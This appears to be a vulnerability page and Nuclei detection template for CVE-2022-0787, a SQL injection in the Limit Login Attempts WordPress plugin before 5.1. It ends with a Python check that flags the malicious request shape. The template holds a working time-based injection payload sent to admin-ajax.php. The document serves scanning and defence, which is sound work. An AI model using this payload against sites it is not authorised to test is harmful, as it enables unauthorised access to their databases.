CVSS2
Attack Vector: NETWORK
Attack Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

EPSS
Percentile: 92.5%

The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.

id: CVE-2022-0787

info:
  name: Limit Login Attempts (Spam Protection) < 5.1 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The Limit Login Attempts (Spam Protection) WordPress plugin before 5.1 does not sanitise and escape some parameters before using them in SQL statements via AJAX actions (available to unauthenticated users), leading to SQL Injections.
  remediation: Fixed in version 5.1
  reference:
    - https://wpscan.com/vulnerability/69329a8a-2cbe-4f99-a367-b152bd85b3dd
    - https://wordpress.org/plugins/wp-limit-failed-login-attempts/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0787
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0787
    cwe-id: CWE-89
    epss-score: 0.04032
    epss-percentile: 0.92073
    cpe: cpe:2.3:a:limit_login_attempts_project:limit_login_attempts:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: limit_login_attempts_project
    product: limit_login_attempts
    framework: wordpress
  tags: cve,cve2022,wpscan,sqli,wordpress,wp-plugin,wp,wp-limit-failed-login-attempts,limit_login_attempts_project

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=WPLFLA_get_log_data&order[][column]=0&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)

    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header, "text/html")
          - contains(body, 'iTotalDisplayRecords')
        condition: and
# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950
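
A defensive check for the request shape used by the template above, as an added example that is not part of the original page or of the plugin's code: it parses a form-encoded admin-ajax.php body and flags WPLFLA_get_log_data requests whose columns[][data] or order[][column] values are not a bare column name or integer. The function name, the allowlist patterns and the benign sample body are assumptions constructed for illustration; the flagged sample is the body shown in the template.

```python
import re
from urllib.parse import parse_qsl

# AJAX action named in the template on this page.
ACTION = "WPLFLA_get_log_data"

# Assumption: legitimate DataTables-style values are a bare column name or a
# numeric index. Each rule is (key pattern, allowed value pattern).
RULES = [
    (re.compile(r"columns\[\d*\]\[data\]"), re.compile(r"[A-Za-z_][A-Za-z0-9_]*|\d+")),
    (re.compile(r"order\[\d*\]\[column\]"), re.compile(r"\d+")),
]

# Constructed benign body ("ip" is a hypothetical column name).
BENIGN_BODY = "action=WPLFLA_get_log_data&order[0][column]=0&columns[0][data]=ip"
# Body taken from the template on this page.
TEMPLATE_BODY = (
    "action=WPLFLA_get_log_data&order[][column]=0"
    "&columns[][data]=(SELECT+7382+FROM+(SELECT(SLEEP(6)))ameU)"
)


def suspicious_params(body: str) -> list[tuple[str, str]]:
    """Return (key, value) pairs that fail the allowlist for this action."""
    # parse_qsl URL-decodes keys and values, so %5B/%5D and '+' are normalised
    # before matching and encoded variants are treated the same way.
    pairs = parse_qsl(body, keep_blank_values=True)
    if dict(pairs).get("action") != ACTION:
        return []  # a different AJAX action, out of scope for this check
    flagged = []
    for key, value in pairs:
        for key_re, value_re in RULES:
            if key_re.fullmatch(key) and not value_re.fullmatch(value):
                flagged.append((key, value))
    return flagged


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("template", TEMPLATE_BODY)):
        print(name, suspicious_params(body))
```

A check like this belongs in a WAF rule or a must-use plugin in front of the AJAX handler until the plugin is updated to 5.1 or later, which is the fix the page names.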